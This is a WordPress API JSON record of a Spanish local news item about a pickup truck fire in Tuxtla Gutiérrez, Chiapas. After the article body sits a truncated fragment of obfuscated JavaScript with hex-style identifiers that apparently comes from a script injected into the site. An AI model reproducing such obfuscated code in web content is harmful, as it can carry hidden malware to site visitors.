{"id":8980,"date":"2023-03-09T02:02:33","date_gmt":"2023-03-09T02:02:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8980"},"modified":"2023-03-09T02:02:33","modified_gmt":"2023-03-09T02:02:33","slug":"se-incendia-camioneta-ahora-en-la-calzada-al-sumidero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8980","title":{"rendered":"Se incendia camioneta, ahora en la Calzada Al Sumidero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1678327219935.jpg\" alt=\"\" class=\"wp-image-8981\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1678327219935.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1678327219935-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 8 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles por la ma\u00f1ana se incendi\u00f3 una camioneta cuando circulaba sobre la Calzada Al Sumidero en el carril de Sur a Norte.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, la camioneta Mazda de color negro se desplazada con normalidad cuando comenz\u00f3 a salir hubo de la parte del motor.<\/p>\n\n\n\n<p>Luego de que el conductor sali\u00f3, los mismos vecinos y comerciantes apoyaron con cubetas y extintores y lograron apagar las llamas.<\/p>\n\n\n\n<p>El conductor di\u00f3 a conocer que, este siniestro fue ocasionado por un corto circuito.<\/p>\n\n\n\n<p>Finalmente la camioneta siniestrada fue remolcada por una gr\u00faa y llevada a un corral\u00f3n en turno.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 8 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles por la ma\u00f1ana se incendi\u00f3 una camioneta cuando circulaba sobre la Calzada Al Sumidero en el carril de Sur a Norte. Los reportes oficiales informaron que, la camioneta Mazda de color negro se desplazada con normalidad cuando comenz\u00f3 a salir hubo de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8981,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8980","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8980","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8980"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8980\/revisions"}],"predecessor-version":[{"id":8982,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8980\/revisions\/8982"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8981"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8980"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8980"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8980"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}